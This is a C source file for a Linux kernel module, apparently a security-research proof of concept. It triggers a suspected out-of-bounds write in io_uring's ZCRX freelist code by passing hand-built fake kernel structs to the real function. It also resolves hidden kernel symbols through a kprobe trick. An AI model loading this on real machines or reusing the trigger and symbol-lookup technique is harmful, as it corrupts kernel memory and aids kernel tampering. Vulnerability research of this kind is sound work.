/*
 * Kernel module PoC: io_uring ZCRX freelist OOB write
 *
 * Demonstrates CVE candidate: io_zcrx_return_niov_freelist() missing
 * bounds check on free_count vs num_niovs.
 *
 * Struct offsets verified from BTF (/sys/kernel/btf/vmlinux):
 *   io_zcrx_area: nia@0, ifq@24, user_refs@32, freelist_lock@64,
 *                 free_count@68, freelist@72
 *   net_iov:      desc(pp@16), owner@48, type@56
 *   net_iov_area: niovs@0, num_niovs@8
 *
 * Build: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
 * Load:  insmod zcrx_oob_kmod.ko
 * Check: dmesg | tail -20
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/types.h>
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/atomic.h>
#include <linux/kprobes.h>
#include <linux/printk.h>
#include <linux/build_bug.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Research");
MODULE_DESCRIPTION("io_uring ZCRX freelist OOB PoC");
MODULE_VERSION("1.0");

/* ── kallsyms resolution via kprobe trick (works on 5.7+ kernels) ── */

typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
static kallsyms_lookup_name_t my_kallsyms_lookup_name;

static int resolve_kallsyms(void)
{
        static struct kprobe kp = {
                .symbol_name = "kallsyms_lookup_name",
        };
        int ret;

        ret = register_kprobe(&kp);
        if (ret < 0) {
                pr_err("zcrx_poc: kprobe register failed: %d\n", ret);
                return ret;
        }
        my_kallsyms_lookup_name = (kallsyms_lookup_name_t)kp.addr;
        unregister_kprobe(&kp);

        pr_info("zcrx_poc: kallsyms_lookup_name @ %px\n",
                my_kallsyms_lookup_name);
        return 0;
}

/* ── Minimal struct mirrors (BTF-verified offsets) ── */

/*
 * We mirror only the fields we need. The real structs have many more
 * members, but we allocate the full sizes to match the kernel layout.
 */

/* net_iov_area: size=24 (BTF verified) */
struct fake_niov_area {
        struct net_iov *niovs;          /* +0 */
        size_t num_niovs;               /* +8 */
        unsigned long base_virtual;     /* +16 */
};

/*
 * io_zcrx_area: size=192, aligned(64) (BTF verified)
 *   freelist_lock @ +64 (forced align)
 *   free_count    @ +68
 *   freelist      @ +72
 */
struct fake_zcrx_area {
        struct fake_niov_area nia;      /* +0..23 */
        void *ifq;                      /* +24 */
        atomic_t *user_refs;            /* +32 */
        bool is_mapped;                 /* +40 */
        u8 _pad1;                       /* +41 */
        u16 area_id;                    /* +42 */
        u8 _holes[20];                  /* +44..63 */
        /* --- cacheline 1 boundary (64 bytes), forced align --- */
        spinlock_t freelist_lock __attribute__((__aligned__(64))); /* +64 */
        u32 free_count;                 /* +68 */
        u32 *freelist;                  /* +72 */
        /* +80: io_zcrx_mem (80 bytes), we don't need it */
        u8 _mem[80];                    /* +80..159 */
        u8 _tail[32];                   /* +160..191 */
} __attribute__((__aligned__(64)));

/*
 * net_iov: size=64, cachelines=1 (BTF verified)
 * In the kernel this is union { netmem_desc desc; struct { _flags,
 * pp_magic, pp, ... } }; we flatten it to the members we touch.
 */
struct fake_net_iov {
        unsigned long _flags;           /* +0 */
        unsigned long pp_magic;         /* +8 */
        struct page_pool *pp;           /* +16 — NULL = copy fallback path */
        unsigned long _pp_pad;          /* +24 */
        unsigned long dma_addr;         /* +32 */
        atomic_long_t pp_ref_count;     /* +40 */
        /* end of union @ +48 */
        struct fake_niov_area *owner;   /* +48 */
        u32 type;                       /* +56 */
        u32 _pad;                       /* +60 */
};
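/*
 * Compile-time counterparts of the runtime offset checks in init below,
 * assuming the BTF layout quoted in the header comment. On configs that
 * grow spinlock_t (e.g. CONFIG_DEBUG_SPINLOCK), the build fails here
 * instead of the module aborting at load time.
 */
static_assert(sizeof(struct fake_zcrx_area) == 192);
static_assert(sizeof(struct fake_net_iov) == 64);
static_assert(offsetof(struct fake_zcrx_area, freelist_lock) == 64);
static_assert(offsetof(struct fake_zcrx_area, free_count) == 68);
static_assert(offsetof(struct fake_zcrx_area, freelist) == 72);
static_assert(offsetof(struct fake_net_iov, pp) == 16);
static_assert(offsetof(struct fake_net_iov, owner) == 48);
static_assert(offsetof(struct fake_net_iov, type) == 56);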
/* Function pointer type for io_zcrx_return_niov */
typedef void (*io_zcrx_return_niov_fn)(struct net_iov *niov);

static int __init zcrx_oob_init(void)
{
        struct fake_zcrx_area *area = NULL;
        struct fake_net_iov *niov = NULL;
        io_zcrx_return_niov_fn return_niov_fn;
        u32 canary = 0xDEADBEEF;
        u32 *freelist_guard;
        int ret = 0;

        pr_info("zcrx_poc: ========================================\n");
        pr_info("zcrx_poc: io_uring ZCRX freelist OOB PoC\n");
        pr_info("zcrx_poc: Target: io_zcrx_return_niov_freelist()\n");
        pr_info("zcrx_poc: ========================================\n");

        /* Step 1: resolve kallsyms */
        if (resolve_kallsyms() < 0)
                return -EINVAL;

        return_niov_fn = (io_zcrx_return_niov_fn)
                my_kallsyms_lookup_name("io_zcrx_return_niov");
        if (!return_niov_fn) {
                pr_err("zcrx_poc: io_zcrx_return_niov not found in kallsyms\n");
                return -ENOENT;
        }
        pr_info("zcrx_poc: io_zcrx_return_niov @ %px\n", return_niov_fn);

        /* Step 2: verify that the mirrored struct layout matches BTF */
        pr_info("zcrx_poc: sizeof(fake_zcrx_area) = %zu (want 192)\n",
                sizeof(*area));
        pr_info("zcrx_poc: sizeof(fake_net_iov) = %zu (want 64)\n",
                sizeof(*niov));
        pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = %zu (want 64)\n",
                offsetof(struct fake_zcrx_area, freelist_lock));
        pr_info("zcrx_poc: offsetof(fake_zcrx_area, free_count) = %zu (want 68)\n",
                offsetof(struct fake_zcrx_area, free_count));
        pr_info("zcrx_poc: offsetof(fake_zcrx_area, freelist) = %zu (want 72)\n",
                offsetof(struct fake_zcrx_area, freelist));

        if (offsetof(struct fake_zcrx_area, freelist_lock) != 64 ||
            offsetof(struct fake_zcrx_area, free_count) != 68 ||
            offsetof(struct fake_zcrx_area, freelist) != 72) {
                pr_err("zcrx_poc: struct layout mismatch! Aborting.\n");
                return -EINVAL;
        }

        /* Step 3: allocate an area with a known-small freelist (num_niovs=1) */
        area = kzalloc(sizeof(*area), GFP_KERNEL);
        if (!area) {
                ret = -ENOMEM;
                goto out;
        }
        niov = kzalloc(sizeof(*niov), GFP_KERNEL);
        if (!niov) {
                ret = -ENOMEM;
                goto out;
        }
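        /*
         * For reference, the store we expect the trigger call to reach.
         * This is a sketch reconstructed from this PoC's assumptions
         * about io_zcrx_return_niov_freelist(), not verbatim kernel
         * source:
         *
         *      spin_lock_bh(&area->freelist_lock);
         *      area->freelist[area->free_count++] = net_iov_idx(niov);
         *      spin_unlock_bh(&area->freelist_lock);
         *
         * There is no check of free_count against nia.num_niovs, so with
         * a full freelist the store lands one u32 past the allocation.
         */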
        /*
         * Allocate a freelist for exactly one niov, then place a CANARY
         * guard word immediately after it. The OOB write lands on the
         * canary.
         *
         * Layout: [freelist[0]] [canary=0xDEADBEEF]
         *                       ^^^^^^^^^^^^^^^^^^^
         *                       OOB write lands here
         */
        freelist_guard = kmalloc(2 * sizeof(u32), GFP_KERNEL);
        if (!freelist_guard) {
                ret = -ENOMEM;
                goto out;
        }
        freelist_guard[0] = 0;          /* freelist[0] = niov index 0 (free) */
        freelist_guard[1] = canary;     /* guard: must not change */

        /* Set up area */
        area->nia.niovs = (struct net_iov *)niov;
        area->nia.num_niovs = 1;
        spin_lock_init(&area->freelist_lock);
        area->free_count = 1;           /* freelist is FULL: the single niov is free */
        area->freelist = freelist_guard;
        area->area_id = 0;

        /* Set up niov: pp=NULL triggers the copy-fallback path in io_zcrx_return_niov */
        niov->pp = NULL;                /* offset 16 = page_pool pointer = NULL */
        niov->owner = &area->nia;       /* offset 48 */
        niov->type = 3;                 /* NET_IOV_IOURING = 3 */

        pr_info("zcrx_poc: Setup complete:\n");
        pr_info("zcrx_poc:   area @ %px (size %zu)\n", area, sizeof(*area));
        pr_info("zcrx_poc:   area->nia @ %px\n", &area->nia);
        pr_info("zcrx_poc:   niov @ %px (pp=%px)\n", niov, niov->pp);
        pr_info("zcrx_poc:   freelist @ %px [0]=%u [1(guard)]=0x%08x\n",
                freelist_guard, freelist_guard[0], freelist_guard[1]);
        pr_info("zcrx_poc:   free_count = %u (== num_niovs=%zu → freelist FULL)\n",
                area->free_count, area->nia.num_niovs);
        pr_info("zcrx_poc:\n");
        pr_info("zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***\n");
        pr_info("zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov)\n");
        pr_info("zcrx_poc: Will execute: freelist[free_count++] = niov_idx\n");
        pr_info("zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1] → OOB!\n");

        /* Step 4: TRIGGER - freelist is full (free_count == num_niovs == 1) */
        return_niov_fn((struct net_iov *)niov);

        /* Step 5: check the canary */
        pr_info("zcrx_poc:\n");
        pr_info("zcrx_poc: Post-call state:\n");
        pr_info("zcrx_poc:   free_count = %u (was 1)\n", area->free_count);
        pr_info("zcrx_poc:   freelist[0] = %u\n", freelist_guard[0]);
        pr_info("zcrx_poc:   freelist[1] = 0x%08x (canary was 0x%08x)\n",
                freelist_guard[1], canary);

        if (freelist_guard[1] != canary) {
                pr_alert("zcrx_poc: *** OOB WRITE CONFIRMED ***\n");
                pr_alert("zcrx_poc: freelist[1] overwritten: 0x%08x → 0x%08x\n",
                         canary, freelist_guard[1]);
                pr_alert("zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check!\n");
                pr_alert("zcrx_poc: free_count=%u overran num_niovs=1\n",
                         area->free_count);
        } else if (area->free_count > 1) {
                pr_alert("zcrx_poc: *** free_count overran num_niovs! (count=%u niovs=%zu) ***\n",
                         area->free_count, area->nia.num_niovs);
                pr_alert("zcrx_poc: OOB write occurred (canary may be in the same cache line)\n");
        } else {
                pr_warn("zcrx_poc: No OOB detected — struct layout may differ.\n");
                pr_warn("zcrx_poc: Check whether io_zcrx_return_niov was actually called.\n");
        }

        kfree(freelist_guard);
out:
        kfree(niov);
        kfree(area);
        /* On success, return -EPERM so the module unloads immediately after init;
         * on an allocation failure, report the real error instead. */
        return ret ?: -EPERM;
}

static void __exit zcrx_oob_exit(void)
{
        pr_info("zcrx_poc: module unloaded\n");
}

module_init(zcrx_oob_init);
module_exit(zcrx_oob_exit);
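/*
 * Minimal out-of-tree Makefile sketch matching the Build/Load lines in
 * the header comment (assumes this file is saved as zcrx_oob_kmod.c):
 *
 *      obj-m := zcrx_oob_kmod.o
 *
 *      all:
 *              $(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 *
 *      clean:
 *              $(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
 */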